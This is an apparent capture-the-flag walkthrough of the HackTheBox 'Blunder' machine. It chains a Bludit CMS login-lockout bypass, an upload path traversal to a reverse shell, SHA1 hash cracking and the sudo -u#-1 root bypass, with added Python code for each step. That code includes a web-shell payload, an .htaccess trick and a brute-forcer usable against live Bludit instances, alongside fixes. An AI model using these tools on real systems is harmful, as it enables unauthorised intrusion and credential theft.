Blunder – HackTheBox writeup

Blunder is a retired vulnerable Linux machine from HackTheBox. The machine maker is egotisticalSW, thank you. It is rated Easy, with a difficulty rating of 4.1 out of 10.

Kali Linux is used to carry out the enumeration, exploitation and privilege escalation. No automated tools are needed. The goal is to obtain a root shell together with both the user and root flags.

Exploitation Summary

Initial Exploitation

  • Vulnerability: Directory traversal with file upload
  • Explanation: Bludit CMS version 3.9.2 is vulnerable to directory traversal in its image upload, which allows a PHP file to be written outside the intended upload directory. The PHP file can then be executed to obtain a reverse shell.

Privilege Escalation – from www-data

  • Vulnerability: Credentials exposure in files
  • Explanation: User names and password hashes for Bludit CMS are stored in a file called users.php.

Privilege Escalation – from hugo

  • Vulnerability: sudo bypass
  • Explanation: Sudo versions earlier than 1.8.28 have a security bypass that lets a user who may run a command as any non-root user run it as root.


nmap -p- -A -T4
TCP 80: Apache httpd 2.4.41 (Ubuntu)

Initial Exploitation

Only port 80 is open, so it's a website. Let's check out the home page.

home page

Looks like it's a CMS (Content Management System) hosting a few posts and an About page. There isn't additional information on the other pages. The source of the home page shows a version of 3.9.2, but which CMS software this is isn't known yet.

view source

Let's do a directory scan using gobuster to see if there are any other interesting pages or folders:

gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307" -x "txt,html,php"

gobuster finds a couple of interesting URLs: /admin and /todo.txt.


There is a user named fergus that may be useful later. Let's continue with /admin for now.


OK, it's using a CMS called Bludit. I check with Google to see if there are any default credentials. It seems admin is the default user, but there is no default password. So I do some password guessing:

password guessing

Nope. No luck. And after about 10 attempts, my IP address is blocked. Great.

Let's do some more searching to see if there are any exploits available:

google search

I find an exploit that can perform directory traversal and upload a PHP payload. However, this exploit requires authentication, so I need to find credentials to log in first.

Further googling lands me on another exploit that bypasses the brute force protection. That is, I can bypass the IP address lockout:

brute force protection bypass

Sounds like a good path. If I can bypass the lockout protection and brute force valid credentials, those credentials can be used with the first exploit to get an initial foothold.

Some more googling turns up a python script that exploits the brute force protection bypass.

bypass protection exploit

I download it and see how it works:

brute force

It's pretty straightforward: provide the IP address, a username and a wordlist. I use the script to perform a dictionary attack with rockyou.txt against the users admin and fergus. It takes quite a while and doesn't find the password.
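As an added example (not the downloaded script and not Bludit's code), here is the mechanism the bypass relies on, in Python. Bludit 3.9.2 works out the client address from the X-Forwarded-For header before falling back to REMOTE_ADDR, and counts failed logins per address, so a client that changes that header on every request never accumulates enough failures against one address to be locked out. The server side below is a constructed simulation so the loop runs offline; http_login_factory runs the same loop against a real instance, and its form field names and response strings are assumptions about Bludit's login page rather than something this writeup shows.

```python
"""Bludit 3.9.2 brute-force-protection bypass: added example, not the page's script."""
import re

FAILURES_ALLOWED = 10   # Bludit's default lockout threshold (assumption; matches the ~10 attempts seen above)


def client_ip(headers, remote_addr):
    """Mirror Bludit's flawed precedence: client-controlled headers win over the socket address."""
    for name in ("X-Forwarded-For", "Client-IP"):
        if name in headers:
            return headers[name]
    return remote_addr


class BluditLoginSim:
    """Constructed stand-in for /admin/login with Bludit's per-IP lockout rule."""

    def __init__(self, users):
        self.users = users        # {username: password}, constructed sample data
        self.failures = {}        # "ip" as Bludit sees it -> failed attempt count

    def login(self, headers, username, password, remote_addr="10.10.14.1"):
        ip = client_ip(headers, remote_addr)
        if self.failures.get(ip, 0) >= FAILURES_ALLOWED:
            return "blocked"
        if self.users.get(username) == password:
            return "ok"
        self.failures[ip] = self.failures.get(ip, 0) + 1
        return "fail"


def dictionary_attack(login, username, wordlist, spoof_xff):
    """Try every candidate; return the password that logs in, or None if blocked/exhausted.

    With spoof_xff=True each request carries a different X-Forwarded-For value, so the
    server never attributes more than one failure to the same "address".
    """
    for i, candidate in enumerate(wordlist, start=1):
        headers = {}
        if spoof_xff:
            headers["X-Forwarded-For"] = "10.%d.%d.%d" % ((i >> 16) & 255, (i >> 8) & 255, i & 255)
        result = login(headers, username, candidate)
        if result == "ok":
            return candidate
        if result == "blocked":
            return None           # lockout reached; without spoofing this happens after FAILURES_ALLOWED tries
    return None


def http_login_factory(base_url):
    """Build a login() callable for a live Bludit instance (not exercised offline).

    Assumed details: the CSRF token sits in a hidden input named tokenCSRF, a wrong
    password returns a page containing "Username or password incorrect", and a locked
    address returns "IP address has been blocked".
    """
    import requests   # imported lazily so the offline simulation needs no third-party module

    def login(headers, username, password):
        session = requests.Session()
        page = session.get(f"{base_url}/admin/login", headers=headers).text
        token = re.search(r'name="tokenCSRF".*?value="([^"]+)"', page).group(1)
        resp = session.post(f"{base_url}/admin/login", headers=headers, allow_redirects=False,
                            data={"tokenCSRF": token, "username": username,
                                  "password": password, "save": ""})
        if "IP address has been blocked" in resp.text:
            return "blocked"
        if "Username or password incorrect" in resp.text:
            return "fail"
        return "ok"
    return login


# Constructed wordlist: the real password sits past the lockout threshold on purpose.
SAMPLE_WORDLIST = [f"guess{i}" for i in range(15)] + ["RolandDeschain"]

if __name__ == "__main__":
    print("plain:", dictionary_attack(BluditLoginSim({"fergus": "RolandDeschain"}).login,
                                      "fergus", SAMPLE_WORDLIST, spoof_xff=False))
    print("spoofed:", dictionary_attack(BluditLoginSim({"fergus": "RolandDeschain"}).login,
                                        "fergus", SAMPLE_WORDLIST, spoof_xff=True))
```

Running it prints None for the plain attack (locked out after 10 failures) and RolandDeschain for the spoofed one. The fix on the server side is the obvious one: only honour X-Forwarded-For when it was set by a trusted reverse proxy, and otherwise key the lockout on REMOTE_ADDR.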

I then use cewl to scrape the website for a custom wordlist:

cewl -m 4 | sort -u > wordlist

Perform the dictionary attack again:

python3 fergus wordlist
password found

Excellent! Credentials found: fergus:RolandDeschain.

Now let’s go back to the first exploit. Using searchsploit I am able to find the exploit script.

I make a copy of 48701.txt. It's essentially a python script, so I simply rename it. Note that there's a Metasploit module too, but this guide uses the python exploit.

48701 exploit

Looking at the python script, there are a few things to prepare before executing it:

  • update the url, username & password in the script
  • the script suggests using msfvenom to create a PHP reverse shell, but I prefer the one already available in Kali. So I modify Kali's PHP reverse shell with the correct Kali IP address and use port 4000
  • prepare .htaccess file as described
  • start netcat to listen at port 4000

Now time to execute the exploit:

python3 execution

Looking good. Hopefully the payloads are uploaded to the victim machine.

  • use a browser to navigate to the uploaded payload as described in the script.
initial shell

Awesome! Initial shell obtained.
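Why the exploit's two uploads work, as an added example in Python (not the 48701 script and not Bludit's code): the image upload handler appended the client-supplied uuid parameter to the page uploads directory without checking where the result pointed, so uuid=../../tmp landed files in bl-content/tmp, and the .htaccess uploaded alongside the payload is what makes Apache execute the .png as PHP. save_upload_vulnerable reproduces the mistake against a temporary directory; save_upload_hardened shows the checks that close it. The directory layout, file names and payload bytes are constructed for the demo.

```python
"""Bludit 3.9.2 upload path traversal, vulnerable vs hardened: added example."""
import os
import tempfile

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}


def save_upload_vulnerable(base_dir, uuid, filename, data):
    """Reproduces the flaw: uuid (and filename) are joined onto the uploads path unchecked.

    base_dir stands in for bl-content/.  The handler used the pages upload directory as
    the prefix (assumption from the exploit's uuid=../../tmp mapping to bl-content/tmp).
    """
    target_dir = os.path.join(base_dir, "uploads", "pages", uuid)   # "../../tmp" escapes here
    os.makedirs(target_dir, exist_ok=True)
    path = os.path.join(target_dir, filename)                       # ".htaccess" is accepted too
    with open(path, "wb") as fh:
        fh.write(data)
    return os.path.realpath(path)


def save_upload_hardened(base_dir, uuid, filename, data):
    """Same operation with the missing checks: confined directory, safe name, image extension."""
    uploads = os.path.realpath(os.path.join(base_dir, "uploads", "pages"))
    name = os.path.basename(filename)
    if name != filename or name.startswith("."):
        raise ValueError("filename must be a plain name and not a dotfile")
    if os.path.splitext(name)[1].lower() not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    # Resolve the candidate directory and insist it is inside the uploads root.
    target_dir = os.path.realpath(os.path.join(uploads, uuid))
    if os.path.commonpath([uploads, target_dir]) != uploads:
        raise ValueError("uuid escapes the uploads directory")
    os.makedirs(target_dir, exist_ok=True)
    path = os.path.join(target_dir, name)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


# Constructed stand-ins for what the exploit uploads.
PAYLOAD_PNG = b"<?php system($_GET['cmd']); ?>"
HTACCESS = b"RewriteEngine off\nAddType application/x-httpd-php .png\n"


def demo_traversal():
    """Return (payload_path, landed_in_tmp) for the vulnerable handler on a scratch tree."""
    base = tempfile.mkdtemp(prefix="bl-content-")
    evil = save_upload_vulnerable(base, "../../tmp", "evil.png", PAYLOAD_PNG)
    save_upload_vulnerable(base, "../../tmp", ".htaccess", HTACCESS)
    expected = os.path.join(os.path.realpath(base), "tmp", "evil.png")
    return evil, evil == expected


if __name__ == "__main__":
    path, escaped = demo_traversal()
    print("payload written to", path, "- outside uploads/pages:", escaped)
```

With the hardened version the same request fails twice over: the uuid is rejected because its resolved path is not under uploads/pages, and .htaccess is rejected as a dotfile with no image extension. Checking the resolved path (realpath plus commonpath) rather than looking for ".." in the string is what matters; encoded or absolute variants get past a substring check but not past this one.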

Privilege Escalation – from www-data

A quick browse under /home shows that user.txt is at /home/hugo/user.txt. That probably means we want to gain access as hugo.

Keep that in mind and let's start enumerating the system. After some browsing around, I find the file /var/www/bludit-3.9.2/bl-content/databases/users.php containing credentials for admin and fergus.

file with passwords

Unfortunately, those are not for hugo, and the password hashes are salted, so they are not the best cracking target for now. Let's continue enumerating, because I remember the system also has a folder for a newer version of Bludit. Maybe it has something similar:

hugo password

Bingo! Credentials for hugo!

His password hash does not use a salt. That's even better. The hash is 40 hex characters, i.e. 160 bits, so it's most likely a SHA1 hash.
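Cracking the users.php hashes offline, as an added example in Python (not the tool used below): users.php is a one-line PHP die() guard followed by JSON, each user carrying a "password" SHA1 digest and, for the salted entries, a "salt". Bludit computes the stored value as sha1(password + salt), so an unsalted entry is just sha1(password); that scheme is an assumption about Bludit's internals, not something this writeup states. The users.php sample below is constructed, its hashes are generated by the script itself, and the admin and hugo passwords in it are placeholders, not the box's.

```python
"""Parse a Bludit users.php and run a wordlist against its hashes: added example."""
import hashlib
import json
import re


def parse_users_php(text):
    """Drop the PHP guard line (it stops the file being served raw) and load the JSON."""
    body = text.split("\n", 1)[1] if text.lstrip().startswith("<?php") else text
    return json.loads(body)


def looks_like_sha1(digest):
    """The reasoning from the writeup: 40 hex characters is 160 bits, SHA1's output size."""
    return re.fullmatch(r"[0-9a-fA-F]{40}", digest) is not None


def bludit_hash(password, salt=""):
    """sha1(password . salt) (assumed Bludit scheme); empty salt covers the unsalted case."""
    return hashlib.sha1((password + salt).encode()).hexdigest()


def crack_users(users, wordlist):
    """Return {username: password} for every entry whose hash matches a wordlist word."""
    found = {}
    for name, entry in users.items():
        target = entry.get("password", "").lower()
        if not looks_like_sha1(target):
            continue                      # not a SHA1 digest; skip rather than guess
        salt = entry.get("salt", "")      # missing salt == unsalted entry
        for candidate in wordlist:
            if bludit_hash(candidate, salt) == target:
                found[name] = candidate
                break
    return found


def constructed_users_php():
    """A users.php with two salted users and one unsalted one, built from placeholder passwords."""
    users = {
        "admin": {"nickname": "Admin", "role": "admin",
                  "password": bludit_hash("placeholder-admin", "kZ3Xm"), "salt": "kZ3Xm"},
        "fergus": {"nickname": "fergus", "role": "author",
                   "password": bludit_hash("RolandDeschain", "q8fT1"), "salt": "q8fT1"},
        "hugo": {"nickname": "Hugo", "role": "author",
                 "password": bludit_hash("placeholder-hugo")},          # no salt key at all
    }
    return "<?php defined('BLUDIT') or die('Bludit CMS.'); ?>\n" + json.dumps(users, indent=2)


if __name__ == "__main__":
    users = parse_users_php(constructed_users_php())
    words = ["password", "RolandDeschain", "placeholder-hugo"]   # constructed mini wordlist
    print(crack_users(users, words))
```

The salt does not make a SHA1 hash slow to crack, it only stops a precomputed lookup from working; that is why the unsalted hugo hash can be resolved with an online lookup while the salted ones need the wordlist run through the salt as above.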

I try to crack the hash:
sha1 decrypted

Lucky us! The hash is cracked and we have hugo's credentials now:


Let’s try to login as hugo:

shell: hugo

Success! We are logged in as hugo. Let's grab the flag quickly.

user flag

Privilege Escalation – from hugo

Let's do some enumeration. One classic check is sudo -l:


Nice, hugo can execute bash as any user except root.

Googling for sudo exploits reveals a security bypass that leads to privilege escalation:

sudo exploit

It works for sudo versions < 1.8.28. Let's find out the sudo version:

sudo version

Perfect! Let’s get root using this sudo bypass exploit:

sudo bypass

There we go! Root shell access. Let's finish the final work: the root flag.

root flag
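The two checks above (the runas rule and the sudo version) turned into a small Python script, as an added example that is not the exploit downloaded here. The bug behind it: a rule like (ALL, !root) /bin/bash lets hugo run bash as anyone except root, but sudo before 1.8.28 accepted -u#-1 (uid 4294967295), which is neither uid 0 nor the name "root", and setresuid(-1) leaves sudo's already-root effective uid untouched, so the shell runs as root. The sudo -l and sudo --version outputs below are constructed to match what the writeup describes, including the version string.

```python
"""Decide whether sudo -u#-1 (CVE-2019-14287) applies, from sudo -l output: added example."""
import re

FIXED_IN = (1, 8, 28)    # first release that rejects uid -1 / 4294967295

# Constructed sample output, not copied from the box.
SUDO_VERSION = "Sudo version 1.8.25p1\nSudoers policy plugin version 1.8.25p1\n"
SUDO_L = """Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""

_TAG = re.compile(r"^(?:(?:NO)?PASSWD|(?:NO)?SETENV|(?:NO)?EXEC|LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT):\s*")


def parse_sudo_version(text):
    """'Sudo version 1.8.25p1' -> (1, 8, 25); the patch suffix does not affect the fix."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no sudo version line found")
    return tuple(int(x) for x in m.groups())


def runas_rules(sudo_l_text):
    """Yield (runas_spec, command) from the '(spec) command' lines of sudo -l."""
    for line in sudo_l_text.splitlines():
        m = re.match(r"\s*\(([^)]*)\)\s+(.*\S)", line)
        if m:
            cmd = m.group(2)
            while _TAG.match(cmd):          # strip NOPASSWD: and similar tags
                cmd = _TAG.sub("", cmd, count=1)
            yield m.group(1), cmd


def excludes_only_root(runas_spec):
    """True for specs like 'ALL, !root' or 'ALL, !#0': any user is allowed except root."""
    users = [u.strip() for u in runas_spec.split(":")[0].split(",")]
    return "ALL" in users and any(u in ("!root", "!#0") for u in users)


def bypass_commands(sudo_version_text, sudo_l_text):
    """Commands that would run as root via -u#-1, or [] when the version or rules rule it out."""
    if parse_sudo_version(sudo_version_text) >= FIXED_IN:
        return []
    return [f"sudo -u#-1 {cmd}" for spec, cmd in runas_rules(sudo_l_text) if excludes_only_root(spec)]


if __name__ == "__main__":
    print(bypass_commands(SUDO_VERSION, SUDO_L))
```

On the constructed sample this returns ["sudo -u#-1 /bin/bash"], which is the command used for the escalation. A rule that names a specific runas user instead of ALL, or a sudo at 1.8.28 or later, gives an empty list; the script reports only from the two outputs and does not run anything.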
